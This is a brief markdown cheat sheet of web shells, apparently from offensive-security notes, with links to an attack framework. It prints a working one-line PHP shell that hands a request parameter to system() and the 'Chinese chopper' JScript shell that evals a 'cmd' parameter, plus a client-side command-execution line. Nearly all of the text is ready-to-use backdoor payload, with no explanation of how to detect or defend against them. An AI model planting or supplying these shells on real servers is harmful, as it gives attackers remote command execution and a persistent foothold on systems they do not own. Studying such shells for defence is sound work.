# Web Shells

* <https://github.com/kraken-ng/Kraken>

## PHP

* <https://stackoverflow.com/a/3697776>

```php
<?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1');} ?>
```

## ASP

### JScript

Chinese chopper:

```csharp
// Server-side
<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["cmd"],"unsafe");}</script>
// Client-side
Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").stdout.readall())
```